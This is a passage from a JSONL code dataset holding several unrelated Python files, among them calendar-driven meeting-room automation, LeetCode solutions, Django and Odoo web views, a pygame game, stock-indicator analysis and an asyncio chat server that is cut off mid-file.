service.events().list(calendarId='6u90hp5dcljnc59u87b7323on0@group.calendar.google.com', timeMin=now,\n singleEvents=True, orderBy='startTime', timeZone='Etc/Zulu',\n maxResults=10).execute()\n events = events_result.get('items', [])\n \n if not events:\n print('No upcoming events found.')\n for event in events:\n startTime = event['start'].get('dateTime')\n endTime = event['end'].get('dateTime')\n if startTime == None:\n print (\"No time for this event\")\n elif startTime < now and endTime > now and eventName != event['summary']: \n print(\"Now\"+now+\" StartTime=\"+startTime+\" EndTime=\"+endTime)\n print(\"Live event\")\n requests.get(meeting_room+\"/projector\"+\"/on\")\n requests.get(meeting_room+\"/blind\"+\"/off\")\n requests.get(meeting_room+\"/light\"+\"/off\")\n eventName=event['summary']\n\n time.sleep(60)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"data_processing/quickstart.py","file_name":"quickstart.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9523338","text":"# https://leetcode.com/explore/featured/card/30-day-leetcoding-challenge/530/week-3/3301/\n\n\"\"\"\nGiven a string containing only three types of characters: '(', ')' and '*', write a function to check whether this string is valid. 
We define the validity of a string by these rules:\n\nAny left parenthesis '(' must have a corresponding right parenthesis ')'.\nAny right parenthesis ')' must have a corresponding left parenthesis '('.\nLeft parenthesis '(' must go before the corresponding right parenthesis ')'.\n'*' could be treated as a single right parenthesis ')' or a single left parenthesis '(' or an empty string.\nAn empty string is also valid.\n\nExample 1:\nInput: \"()\"\nOutput: True\nExample 2:\nInput: \"(*)\"\nOutput: True\nExample 3:\nInput: \"(*))\"\nOutput: True\n\nNote:\nThe string size will be in the range [1, 100].\n\n\"\"\"\n\nclass Solution:\n def checkValidString(self, s: str) -> bool:\n min_closing_needed = max_closing_needed = 0\n for char in s:\n if char == \")\":\n max_closing_needed -= 1\n else:\n max_closing_needed += 1 \n \n if char == '(':\n min_closing_needed += 1 \n else:\n min_closing_needed = max(min_closing_needed - 1, 0)\n \n if max_closing_needed < 0: \n return False\n \n return min_closing_needed == 0\n\nsolution = Solution()\n\nexamples = [\n \"()\", # True\n \"(*)\", # True\n \"(*))\", # True\n \"((*))\", # True\n \"((*)\", # True\n \"()(*\", # True\n \"(()\", # False\n \"((*\" # False\n]\n\nfor ex in examples:\n print (\n solution.checkValidString(ex)\n )\n print(\"\")","sub_path":"Leetcode/30-day-challenge/valid_parenthesis_string.py","file_name":"valid_parenthesis_string.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"561733614","text":"# -*- coding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution, third party addon\n# Copyright (C) 2004-2015 Vertel AB ().\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. 
If not, see .\n#\n##############################################################################\nimport base64\n\nimport werkzeug\nimport werkzeug.urls\n\nfrom openerp import http\nfrom openerp.http import request\nfrom openerp.tools.translate import _\n\nimport logging\n_logger = logging.getLogger(__name__)\n\n\nclass ContactUs(http.Controller):\n\n @http.route(['/project_contact_form'], method='POST', auth='public', website=True)\n def send_mail(self, **post):\n subject = \"\"\n body = \"\"\n mail = \"\"\n\n # To make sure the site does not crash while trying to editing theme_dermanord.contactus_response\n if not post.get('case'):\n values = {}\n return request.website.render(\"theme_dermanord.contactus_response\", values)\n\n project_id = int(post.get('case'))\n # ~ _logger.warn('Project_id: %s post: %s' %(project_id, post))\n project = request.env['project.project'].sudo().browse(project_id)\n\n partner = request.env['res.partner'].search([('email', '=', post.get('email_from'))], limit=1)\n if not partner:\n partner = request.env['res.partner'].create({\n 'name':post.get('contact_name'),\n 'email':post.get('email_from'),\n 'phone':post.get('phone')\n })\n\n request.env[project.alias_model].create({\n 'project_id': project.id,\n 'partner_id':partner.id,\n 'name': post.get('name'), \n 'description': post.get('description'),\n 'message_follower_ids':[(4,partner.id)]\n })\n \n values = {}\n return request.website.render(\"theme_dermanord.contactus_response\", values)\n\n\n\n\n\n\n\n\n\n \n","sub_path":"project_contact_form_dermanord/controllers/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"467881796","text":"import pandas as pd\nimport numpy as np\nfrom scipy.stats import pearsonr, spearmanr\nimport statsmodels.api as sm\nimport scipy.stats as stats\n\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nimport talib\n# note that talib requires that the time series index to be in increasing order\n\n# calculate some technical time series from a price-volume dataframe\n\nclass TAcalc(object):\n def __init__(self):\n self.datetime_index = None\n self.data_dict = {} # numpy array-lized data\n\n def load_data(self,path):\n _data = pd.read_csv(path,index_col='date',parse_dates=['date'])\n self.datetime_index = _data.index\n # numpy array-lize the time series data\n for col_name in ['open','high','low','close','volume']:\n self.data_dict[col_name] = np.array(_data[col_name]).astype(float)\n\n def generate_indicator(self,name):\n if name == 'BBANDS_upper':\n se = talib.BBANDS(self.data_dict['close'])[0]\n elif name == 'BBANDS_middle':\n se = talib.BBANDS(self.data_dict['close'])[1]\n elif name == 'BBANDS_lower':\n se = talib.BBANDS(self.data_dict['close'])[2]\n elif name == 'MA':\n se = talib.MA(self.data_dict['close'], timeperiod=30)\n elif name=='EMA':\n se = talib.EMA(self.data_dict['close'], timeperiod=30)\n elif name=='SMA':\n se = talib.SMA(self.data_dict['close'], timeperiod=30)\n elif name == 'WMA':\n se = talib.WMA(self.data_dict['close'], timeperiod=30)\n\n if name == 'APO':\n se = talib.APO(self.data_dict['close'])\n elif name == 'MACD':\n se = talib.MACD(self.data_dict['close'])[0]\n elif name == 'MOM':\n se = talib.MOM(self.data_dict['close'])\n elif name == 'PPO':\n se = talib.PPO(self.data_dict['close'])\n elif name == 'RSI':\n se = talib.RSI(self.data_dict['close'])\n elif name == 'WILLR':\n se = 
talib.WILLR(self.data_dict['high'],self.data_dict['low'],self.data_dict['close'])\n\n if name == 'OBV':\n se = talib.OBV(self.data_dict['close'],self.data_dict['volume'])\n\n if name == 'ATR':\n se = talib.ATR(self.data_dict['high'], self.data_dict['low'], self.data_dict['close'], timeperiod=14)\n\n ans = pd.Series(se,index=self.datetime_index)\n ans.name = name\n return ans\n\n# a class that explores the relation between two time series\nclass SeriesExplorer(object):\n def __init__(self,target):\n # import data:\n # target is the target variable (like return, volatility, etc.)\n # indep_vars is a pd.DataFrame with multiple time series as independent variables\n self.target = target.sort_index() # so that the time series is in chronicle order\n self.indep = {}\n self.data = pd.DataFrame(self.target)\n\n def add_indep_vars(self,se_list):\n for se in se_list:\n self.indep[se.name] = se\n\n def sync_index(self):\n # sync the datetime index so that the series share the same index\n # store it to self.data DataFrame\n for key in self.indep.keys():\n self.data[key] = self.indep[key]\n\n def fill_na(self,method='last'):\n # fill NaN's after the index sync step\n # note that the index is in increasing order\n if method == 'last':\n self.data.fillna(method='ffill',inplace=True)\n\n def best_shift_test(self,key,method='pearson',test_range=20,plot=False):\n # test which shift series of key column has best correlation with the target variable\n _indep = self.data[key]\n _tar = self.data[self.target.name]\n _corr_list = []\n for d in range(test_range):\n _se = _indep.shift(d)\n nas = np.logical_or(_se.isnull(), _tar.isnull())\n if method == 'pearson':\n ans = pearsonr(_tar[~nas],_se[~nas])[0]\n elif method == 'spearman':\n ans = spearmanr(_tar[~nas],_se[~nas])[0]\n _corr_list.append(ans)\n\n # if plot=True, plot the corr. 
vs diff scatter\n if plot:\n _ = plt.plot(_corr_list)\n maxarg = np.argmax(abs(np.array(_corr_list)))\n plt.title('{2} max={0} at d={1}'.format(_corr_list[maxarg],maxarg,key))\n plt.show()\n\n return _corr_list\n\n def target_dist(self,bins=10,dist=stats.norm):\n # plot the distribution histogram of the target variable\n _ = self.target.hist(bins=bins)\n plt.show()\n\n # plot the qq plot\n _ = sm.qqplot(self.target,dist,fit=True,line='45')#,stats.beta\n plt.show()\n\n def correlation_matrix(self):\n # plot the heatmap of correlations between independent variables\n _l = [c for c in self.indep.keys()]\n _l.sort()\n _corr = self.data[_l].corr()\n g = sns.heatmap(_corr, xticklabels=_corr.columns, yticklabels=_corr.columns)\n g.set_xticklabels(g.get_xticklabels(), rotation=90)\n g.set_yticklabels(g.get_yticklabels(), rotation=0)\n plt.show()\n\n\ndef shift_series(se,diff):\n # shift a time series diff days towards future direction\n ans = se.shift(diff)\n ans.name = '{0}_{1}'.format(se.name,diff)\n return ans\n\n\nif __name__=='__main__':\n # read sugar future SR701 data and generate return series\n df = pd.read_csv('../data/SR701.csv',index_col='date',parse_dates=['date'])\n hold_day = 10\n # note that SR701 data is reverse chronically ordered\n df['rtn'] = np.log(df['close'].shift(hold_day + 1) / df['close'].shift(1))\n rtn_series = df['rtn'].dropna()\n rtn_series.name = 'rtn'\n print(rtn_series)\n close_series = df['close'].shift(1).dropna()\n close_series.name = 'close'\n series_exp = SeriesExplorer(rtn_series)\n #series_exp = SeriesExplorer(close_series)\n\n # make potential independent variable series\n ta_name_list = ['BBANDS_upper','BBANDS_middle','BBANDS_lower','MA','EMA','SMA','WMA','APO','MACD','MOM','PPO','RSI','WILLR','OBV','ATR']\n ta = TAcalc()\n ta.load_data('../data/CZZ.csv')\n\n ta_se_list = []\n for ta_name in ta_name_list:\n se = ta.generate_indicator(ta_name)\n ta_se_list.append(se)\n #print(se)\n\n series_exp.add_indep_vars(ta_se_list)\n series_exp.sync_index()\n series_exp.fill_na()\n #print(series_exp.indep[se.name])\n #print(series_exp.data.head())\n\n #for ta_name in ta_name_list:\n # series_exp.best_shift_test(key=ta_name,method='spearman',plot=True)\n\n series_exp.target_dist(bins=15)\n\n #series_exp.correlation_matrix()","sub_path":"src/taseries.py","file_name":"taseries.py","file_ext":"py","file_size_in_byte":6582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"16595876","text":"import pygame\nimport random\n\nSCREEN_WIDTH = 600\nSCREEN_HEIGHT = 400\n\npygame.init()\nscreen = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT]) # 初始化窗口\npygame.display.set_caption('wxz & Hot dog war') # 设置窗口标题\n\n# 载入背景图\nbackground = pygame.transform.scale(pygame.image.load('./resources/image/1.png'), (1800, 400))\ngame_over_img = pygame.transform.scale(pygame.image.load('./resources/image/game_over.jpg'), (600, 400))\n# 载入王思聪\nwsc_img = pygame.transform.scale(pygame.image.load('./resources/image/wsc.png'), (50, 50))\n# 载入热狗\nhot_dog_img = pygame.transform.scale(pygame.image.load('./resources/image/hot_dog.png'), (30, 30))\n\n# 定义王思聪起始位置\nwsc_x = 20\nwsc_y = 200\nwsc_pos = [wsc_x, wsc_y]\n\n# 定义热狗位置\nhot_dog_y = 200\nhot_dog_x = 550\nhot_dog_pos = [hot_dog_x, hot_dog_y]\n\n# 定义背景图位置\nbg_h = 0\nbg_w = 0\nbg_pos = [bg_h, bg_w]\ngame_over_pos = [600, 0]\n\n# 定义跳跃\njump = False\njump_h = 10\n\n# 定义开始 等级 结束\nstart = False\nend = False\nlevel = 5\nscore = 0\n\n# 得分\nfont = pygame.font.SysFont('arial', 36, True)\n\nwhile 
True:\n\n # 加载背景图\n screen.blit(background, bg_pos)\n screen.blit(font.render('%d' % score, True, [255, 0, 0]), [60, 20])\n screen.blit(hot_dog_img, (20, 16))\n\n # 加载王思聪\n screen.blit(wsc_img, wsc_pos)\n\n # 加载热狗\n screen.blit(hot_dog_img, hot_dog_pos)\n\n # 处理游戏退出\n # 从消息队列中循环取\n for event in pygame.event.get():\n\n if event.type == pygame.QUIT:\n pygame.quit()\n exit()\n\n # 控制\n if event.type == pygame.KEYDOWN:\n\n if event.key == pygame.K_SPACE:\n if start:\n jump = True\n else:\n start = True\n\n # 退出事件\n if event.key == pygame.K_ESCAPE:\n pygame.quit()\n exit()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_SPACE:\n jump = False\n\n if start:\n\n # 同步热狗\n hot_dog_x -= 1 * level\n hot_dog_pos = [hot_dog_x, hot_dog_y]\n if hot_dog_x <= 0:\n hot_dog_x = 600\n hot_dog_y = random.randint(5, 355)\n\n # 背景循环\n bg_h -= 1 * level\n bg_pos = [bg_h, bg_w]\n if bg_h <= -1200:\n bg_h = 0\n level += 1\n\n # 跳跃\n if jump:\n wsc_y -= 5\n wsc_pos = [wsc_x, wsc_y]\n else:\n if wsc_y < 400:\n wsc_y += 4\n wsc_pos = [wsc_x, wsc_y]\n\n # 结束验证\n if wsc_y > 380 or wsc_y < 0:\n game_over_pos = [0, 0]\n start = False\n end = True\n\n # 验证热狗和王思聪\n\n if hot_dog_x > wsc_x and hot_dog_x < wsc_x + 50:\n if hot_dog_y > wsc_y and hot_dog_y < wsc_y + 50:\n score += 1\n hot_dog_x = 600\n hot_dog_y = random.randint(5, 355)\n screen.blit(font.render('%d' % score, True, [255, 0, 0]), [60, 20])\n\n # 结束\n if end:\n screen.blit(game_over_img, game_over_pos)\n\n # 更新窗口\n pygame.display.update()\n","sub_path":"py_game.py","file_name":"py_game.py","file_ext":"py","file_size_in_byte":3240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2892449","text":"# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\ndef showList(node):\n while node:\n print(node.val)\n node = node.next\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n prevHead = None\n while head:\n nextNode = head.next\n head.next = prevHead\n prevHead = head\n head = nextNode\n return prevHead\n\n def reverseList2(self, head: ListNode) -> ListNode:\n if not head or not head.next:\n return head\n last = self.reverseList2(head.next)\n head.next.next = head\n head.next = None\n return last\n \n \nn1 = ListNode(1)\nn2 = ListNode(2)\nn3 = ListNode(3)\nn4 = ListNode(4)\nn5 = ListNode(5)\nn1.next = n2\nn2.next = n3\nn3.next = n4\nn4.next = n5\nx = Solution()\nres = x.reverseList2(n1)\nshowList(res)\n","sub_path":"leetcode206.py","file_name":"leetcode206.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"152245421","text":"import csv\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch\n\nstocksFileName = 'PMAnalysis_with_Live_EOD.csv'\n\ntry:\n es = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\n # initializing the titles and rows list\n fields = []\n rows = []\n\n # reading csv file\n with open(stocksFileName, 'r') as csvfile:\n # creating a csv reader object\n csvreader = csv.reader(csvfile)\n\n # extracting field names through first row\n fields = next(csvreader)\n\n # extracting each data row one by one\n for row in csvreader:\n doc = {}\n col_counter = 0;\n for col in row:\n if (fields[col_counter] != ''):\n doc[fields[col_counter]] = col;\n col_counter += 1\n doc['executionDate'] = datetime.now()\n try:\n res = es.index(index=\"pm_analysis_data\", body=doc)\n except:\n print('Error 
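The hot-dog pickup test in the py_game.py record above is a rectangle check written out by hand; below is a small standalone sketch of the general axis-aligned bounding-box overlap test (the 50x50 and 30x30 sizes mirror the sprites above). With pygame available, pygame.Rect(...).colliderect(...) performs the same test.

def aabb_overlap(ax, ay, aw, ah, bx, by, bw, bh):
    # Two axis-aligned rectangles overlap iff their spans overlap on both axes.
    return ax < bx + bw and bx < ax + aw and ay < by + bh and by < ay + ah

# Player at (20, 200) sized 50x50, hot dog at (60, 230) sized 30x30.
print(aabb_overlap(20, 200, 50, 50, 60, 230, 30, 30))   # True
print(aabb_overlap(20, 200, 50, 50, 200, 230, 30, 30))  # False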
inserting doc')\n print(doc)\nexcept:\n print('error')\n","sub_path":"pm_analysis_data.py","file_name":"pm_analysis_data.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"309620632","text":"from puzzle_gym.envs.puzzle_env import PuzzleEnv\r\n\r\nenv = PuzzleEnv(images=None,\r\n img_size=(36, 36),channel_num=1, puzzle_size=(3, 3), puzzle_type=\"switch\", dist_type=\"manhattan\", penalty_for_step=-0.15,\r\n reward_for_completiton=20, positive_reward_coefficient=1.0, render_mode=\"human\")\r\n\r\nenv.render()\r\ndone = False\r\nwhile not done:\r\n n = int(input(\"Enter n: \"))\r\n _, rew, done, ___ = env.step(n)\r\n print(rew)\r\n","sub_path":"poc.py","file_name":"poc.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"178991681","text":"import math\nn = int(input())\n\ndef nad(n, k):\n '''\n vrne rezultat n nad k\n '''\n if k < 0 or k > n or n < 0:\n return 0\n return math.factorial(n) / (math.factorial(n - k) * math.factorial(k))\n\n\ndef rešitev(n):\n '''\n vrne koliko % možnosti je da se izide\n '''\n slo = dict()\n k = 2\n while k <= n:\n # vmesh možnih je (k - 1)^k\n vmes = (k - 1) ** k\n vsota = 0\n prišrevek = 2\n while prišrevek < k:\n # koliko jih je treba odstraniti\n vmes_vsota = slo[prišrevek]\n vmes_vsota *= nad(k - 1, prišrevek - 1)\n vmes_vsota *= (k - prišrevek - 1) ** (k - prišrevek)\n vsota += vmes_vsota\n prišrevek += 1\n slo[k] = vmes - vsota\n k += 1\n vse_mozno = (n - 1) ** n\n reš = slo[n] / vse_mozno\n return reš\nprint('{0:.12f}'.format(rešitev(n)))","sub_path":"Kattis/absurdistan2.py","file_name":"absurdistan2.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"86813936","text":"# -*- encoding: utf-8 -*-\nfrom django.conf import settings\nfrom django.views.generic import CreateView, UpdateView, ListView, DetailView\nfrom .models import Empleado\nfrom .forms import EmpleadoModelForm, EmpleadoUsuarioForm\nfrom django.core.urlresolvers import reverse_lazy\nfrom rest_framework import viewsets\nfrom django.db.models import Q\nimport socket\nfrom pure_pagination.mixins import PaginationMixin\nfrom django.template.defaultfilters import slugify\n\nfrom infos_sistemas.mixins import TipoPerfilUsuarioMixin\n\nclass EmpleadoCreateView(TipoPerfilUsuarioMixin, CreateView):\n template_name = 'empleado_create.html'\n form_class \t = EmpleadoUsuarioForm\n model = Empleado\n success_url = reverse_lazy('empleado:control')\n\n def form_valid(self, form):\n user = form['model_form_usuario'].save(commit=False)\n user.usuario_creador = self.request.user\n user.ultimo_usuario_editor = user.usuario_creador\n try:\n user.nombre_host = socket.gethostname()\n user.ultimo_nombre_host = user.nombre_host\n except:\n user.nombre_host = 'localhost'\n user.ultimo_nombre_host = user.nombre_host\n user.direccion_ip = socket.gethostbyname(socket.gethostname())\n user.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n\n\n empleado = form['model_form_empleado'].save(commit=False)\n empleado.tipo_persona = 'Natural'\n if empleado.numero_hijo is None:\n empleado.numero_hijo = 0\n\n user.save()\n\n empleado.usuario = user\n empleado.usuario_creador = self.request.user\n empleado.ultimo_usuario_editor = empleado.usuario_creador\n try:\n empleado.nombre_host = socket.gethostname()\n 
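The nad helper in the absurdistan2.py record above builds binomial coefficients from math.factorial, and the division returns a float that can lose precision for large n; on Python 3.8+ math.comb returns the exact integer. A drop-in sketch that keeps the original's out-of-range behaviour:

import math

def nad(n, k):
    # math.comb already returns 0 when k > n but raises on negative
    # arguments, so keep the explicit guard from the original.
    if k < 0 or n < 0 or k > n:
        return 0
    return math.comb(n, k)

print(nad(5, 2))  # 10
print(nad(3, 5))  # 0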
empleado.ultimo_nombre_host = empleado.nombre_host\n except:\n empleado.nombre_host = 'localhost'\n empleado.ultimo_nombre_host = empleado.nombre_host\n empleado.direccion_ip = socket.gethostbyname(socket.gethostname())\n empleado.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n\n empleado.save()\n\n return super(EmpleadoCreateView, self).form_valid(form)\n\n\nclass EmpleadoUpdate(TipoPerfilUsuarioMixin, UpdateView):\n form_class = EmpleadoModelForm\n success_url = reverse_lazy('empleado:control')\n template_name = 'empleado_update.html'\n queryset = Empleado.objects.all()\n\n\n def form_valid(self, form):\n self.object = form.save(commit=False)\n if self.object.numero_hijo is None:\n self.object.numero_hijo = 0\n self.object.ultimo_usuario_editor = self.request.user\n try:\n self.object.ultimo_nombre_host = socket.gethostname()\n except:\n self.object.ultimo_nombre_host = 'localhost'\n\n self.object.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n self.object.save()\n\n return super(EmpleadoUpdate, self).form_valid(form)\n\nclass EmpleadoUsuarioUpdateView(TipoPerfilUsuarioMixin, UpdateView):\n form_class = EmpleadoUsuarioForm\n success_url = reverse_lazy('empleado:control')\n template_name = 'empleado_usuario_update.html'\n queryset = Empleado.objects.all()\n\n def get_context_data(self, **kwarg):\n context = super(EmpleadoUsuarioUpdateView, self).get_context_data(**kwarg)\n empleado = self.queryset.get(slug__contains=self.kwargs['slug'])\n data = {'empleado':empleado}\n context.update(data)\n return context\n\n def get_form_kwargs(self):\n kwargs = super(EmpleadoUsuarioUpdateView, self).get_form_kwargs()\n kwargs.update(instance={\n 'model_form_empleado': self.object,\n 'model_form_usuario': self.object.usuario,\n })\n return kwargs\n\n def form_valid(self, form):\n empleado = self.queryset.get(slug__contains=self.kwargs['slug'])\n user = form['model_form_usuario'].save(commit=False)\n user = empleado.usuario\n user.ultimo_usuario_editor = self.request.user\n try:\n user.ultimo_nombre_host = user.nombre_host\n except:\n user.ultimo_nombre_host = user.nombre_host\n user.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n\n empleado = form['model_form_empleado'].save(commit=False)\n empleado.tipo_persona = 'Natural'\n if empleado.numero_hijo is None:\n empleado.numero_hijo = 0\n user.save()\n\n empleado.usuario = user\n empleado.ultimo_usuario_editor = self.request.user\n try:\n empleado.ultimo_nombre_host = empleado.nombre_host\n except:\n empleado.ultimo_nombre_host = empleado.nombre_host\n empleado.ultimo_direccion_ip = socket.gethostbyname(socket.gethostname())\n empleado.save()\n return super(EmpleadoUsuarioUpdateView, self).form_valid(form)\n\n\nclass EmpleadoDetailView(TipoPerfilUsuarioMixin, DetailView):\n template_name = 'empleado_detail.html'\n model = Empleado\n queryset = Empleado.objects.all()\n\n\nclass EmpleadoControlListView(PaginationMixin, TipoPerfilUsuarioMixin, ListView):\n model = Empleado\n template_name = 'empleados.html'\n paginate_by = 10\n\n def get_context_data(self, **kwarg):\n context = super(EmpleadoControlListView, self).get_context_data(**kwarg)\n boton_menu = False\n total_registro = self.model.objects.count()\n\n data = {\n 'boton_menu' : boton_menu,\n 'total_registro': total_registro,\n }\n\n context.update(data)\n return context\n\n def get(self, request, *args, **kwargs):\n if request.GET.get('search_registro', None):\n self.object_list = self.get_queryset()\n context = self.get_context_data()\n return 
self.render_to_response(context)\n else:\n return super(EmpleadoControlListView, self).get(request, *args, **kwargs)\n\n def get_queryset(self):\n if self.request.GET.get('search_registro', None):\n value = self.request.GET.get('search_registro', None)\n queryset = self.model.objects.filter(Q(slug__icontains=slugify(value)))\n else:\n queryset = super(EmpleadoControlListView, self).get_queryset()\n return queryset\n","sub_path":"empleados/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"64126567","text":"import asyncio\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s-[%(levelname)s]-[%(funcName)s:%(lineno)d]:%(message)s',\n datefmt='%Y/%m/%d,%H:%M:%S')\n\n\n# 定义结束异常类\nclass EndSession(Exception):\n pass\n\n'''\n异步通信基类\n'''\nclass AbstractAsyncioBase():\n def __init__(self, reader, writer, loop):\n logging.debug('%s:=======start========' %('AbstractAsyncioBase'))\n self._reader = reader\n self._writer = writer\n self._loop = loop\n asyncio.run_coroutine_threadsafe(self.on_read(), loop)\n\n async def on_read(self):\n logging.debug('%s:=======start========' %('on_read'))\n while True:\n logging.debug(\"reading......\")\n line = await self._reader.read(1000)\n if not line:\n print (\"[on_read]connection exit.\\n\")\n break\n\n print('[on_read]Recieve:%s' %(line.decode('utf-8').rstrip()))\n\n logging.debug('%s:*******end*******' %('on_read'))\n\nclass AsyncioChat(AbstractAsyncioBase):\n ac_in_buffer_size = 65536\n # we don't want to enable the use of encoding by default, because that is a\n # sign of an application bug that we don't want to pass silently\n\n use_encoding = 0\n encoding = 'latin-1'\n\n def __init__(self, reader, writer, loop):\n AbstractAsyncioBase.__init__(self, reader, writer, loop)\n # for string terminator matching\n self.ac_in_buffer = b''\n\n async def on_read(self):\n logging.debug('%s:=======start========' %('AsyncioChat.on_read'))\n while True:\n logging.debug(\"reading......\")\n line = await self._reader.read(self.ac_in_buffer_size)\n if not line:\n print (\"[on_read]connection exit.\\n\")\n break\n\n print('[AsyncioChat.on_read]Recieve:%s%s' %(line.decode('utf-8').rstrip(),'\\n'))\n self.handle_read(line)\n\n logging.debug('%s:*******end*******' %('AsyncioChat.on_read'))\n\n def set_terminator(self, term):\n \"\"\"Set the input delimiter.\n\n Can be a fixed string of any length, an integer, or None.\n \"\"\"\n if isinstance(term, str) and self.use_encoding:\n term = bytes(term, self.encoding)\n elif isinstance(term, int) and term < 0:\n raise ValueError('the number of received bytes must be positive')\n self.terminator = term\n\n def get_terminator(self):\n return self.terminator\n\n def handle_close(self):\n self._writer.close()\n\n def handle_read(self, data):\n logging.debug('%s:=======start========' %('AsyncioChat.handle_read'))\n if isinstance(data, str) and self.use_encoding:\n data = bytes(data, self.encoding)\n self.ac_in_buffer = self.ac_in_buffer + data\n\n # Continue to search for self.terminator in self.ac_in_buffer,\n # while calling self.collect_incoming_data. 
The while loop\n # is necessary because we might read several data+terminator\n # combos with a single recv(4096).\n\n while self.ac_in_buffer:\n lb = len(self.ac_in_buffer)\n terminator = self.get_terminator()\n if not terminator:\n # no terminator, collect it all\n self.collect_incoming_data(self.ac_in_buffer)\n self.ac_in_buffer = b''\n elif isinstance(terminator, int):\n # numeric terminator\n n = terminator\n if lb < n:\n self.collect_incoming_data(self.ac_in_buffer)\n self.ac_in_buffer = b''\n self.terminator = self.terminator - lb\n else:\n self.collect_incoming_data(self.ac_in_buffer[:n])\n self.ac_in_buffer = self.ac_in_buffer[n:]\n self.terminator = 0\n self.found_terminator()\n else:\n # 3 cases:\n # 1) end of buffer matches terminator exactly:\n # collect data, transition\n # 2) end of buffer matches some prefix:\n # collect data to the prefix\n # 3) end of buffer does not match any prefix:\n # collect data\n terminator_len = len(terminator)\n index = self.ac_in_buffer.find(terminator)\n if index != -1:\n # we found the terminator\n if index > 0:\n # don't bother reporting the empty string\n # (source of subtle bugs)\n self.collect_incoming_data(self.ac_in_buffer[:index])\n self.ac_in_buffer = self.ac_in_buffer[index+terminator_len:]\n # This does the Right Thing if the terminator\n # is changed here.\n self.found_terminator()\n else:\n # check for a prefix of the terminator\n index = find_prefix_at_end(self.ac_in_buffer, terminator)\n if index:\n if index != lb:\n # we found a prefix, collect up to the prefix\n self.collect_incoming_data(self.ac_in_buffer[:-index])\n self.ac_in_buffer = self.ac_in_buffer[-index:]\n break\n else:\n # no prefix, collect it all\n self.collect_incoming_data(self.ac_in_buffer)\n self.ac_in_buffer = b''\n logging.debug('%s:*******end*******' %('AsyncioChat.handle_read'))\n\n\n def collect_incoming_data(self, data):\n raise NotImplementedError(\"must be implemented in subclass\")\n\n def found_terminator(self):\n raise NotImplementedError(\"must be implemented in subclass\")\n\n def push(self, data):\n logging.debug('%s:=======start========' %('push'))\n logging.debug('data:%s' %(data))\n self._writer.write(data)\n logging.debug('%s:*******end*******' %('push'))\n\n# this could maybe be made faster with a computed regex?\n# [answer: no; circa Python-2.0, Jan 2001]\n# new python: 28961/s\n# old python: 18307/s\n# re: 12820/s\n# regex: 14035/s\n\ndef find_prefix_at_end(haystack, needle):\n l = len(needle) - 1\n while l and not haystack.endswith(needle[:l]):\n l -= 1\n return l\n\nclass ChatServer():\n \"\"\"\n 聊天服务器\n \"\"\"\n def __init__(self, host, port, loop):\n\n self.co_srv = None\n self._host = host\n self._port = port\n self._loop = loop\n self.users = {}\n self.main_room = ChatRoom(self)\n\n async def run_server(self):\n self.co_srv= await asyncio.start_server(self.handle_accept, self._host, self._port, loop=loop)\n print('Server started at http://%s:%s...'%(self._host, self._port))\n\n def handle_accept(self, reader, writer):\n logging.debug('%s:=======start========' %('handle_accept'))\n ChatSession(self, reader, writer, self._loop)\n logging.debug('%s:*******end********' %('handle_accept'))\n\nclass ChatSession(AsyncioChat):\n \"\"\"\n 负责和客户端通信\n \"\"\"\n\n def __init__(self, server, reader, writer, loop):\n AsyncioChat.__init__(self, reader, writer, loop)\n self.server = server\n self.set_terminator(b'\\n')\n self.data = []\n self.name = None\n self.enter(LoginRoom(server))\n\n def enter(self, room):\n #一个session属于一个 room, 互相注册,能互相引用对方\n # 
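A quick runnable illustration of why the terminator scan above needs find_prefix_at_end (the helper is copied verbatim from the record): a terminator can arrive split across two reads, so the buffer may end with only a prefix of it that must be held back.

def find_prefix_at_end(haystack, needle):
    l = len(needle) - 1
    while l and not haystack.endswith(needle[:l]):
        l -= 1
    return l

# A '\r\n' terminator split across reads: the first chunk ends with just '\r'.
print(find_prefix_at_end(b'hello\r', b'\r\n'))  # 1 -> keep the last byte buffered
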